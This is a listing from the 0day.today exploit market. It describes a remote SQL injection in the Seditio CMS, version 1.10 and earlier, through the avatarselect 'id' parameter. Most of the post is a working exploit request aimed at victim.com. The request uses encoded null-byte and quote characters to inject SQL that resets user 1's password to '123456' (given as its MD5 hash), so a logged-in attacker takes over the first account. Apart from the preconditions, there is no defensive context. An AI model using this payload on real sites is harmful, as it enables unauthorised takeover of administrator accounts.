[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Seditio <= 1.10 (avatarselect id) Remote SQL Injection Vulnerability

Author
nukedx
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1187
Category
web applications
Date add
21-11-2006
Platform
unsorted
====================================================================
Seditio <= 1.10 (avatarselect id) Remote SQL Injection Vulnerability
====================================================================



Seditio <= 1.10 Remote SQL Injection (avatarselect id) Vulnerability
Discovered by: nukedx
----
GET -> http://www.victim.com/users.php?m=profile&a=avatarselect&x=XVALUE&id=default.gif[SQL Inject]
GET -> http://www.victim.com/users.php?m=profile&a=avatarselect&x=011A99&id=default.gif%2500%2527,user_password=%2527e10adc3949ba59abbe56e057f20f883e%2527/**/where/**/user_id=1/* with this example remote attacker changes password of 1st user of Seditio to 123456 
The XVALUE is comes with your avatarselect link it's special to everyuser in Seditio.
For using this vulnerability you must be logged in to Seditio... 




#  0day.today [2024-09-28]  #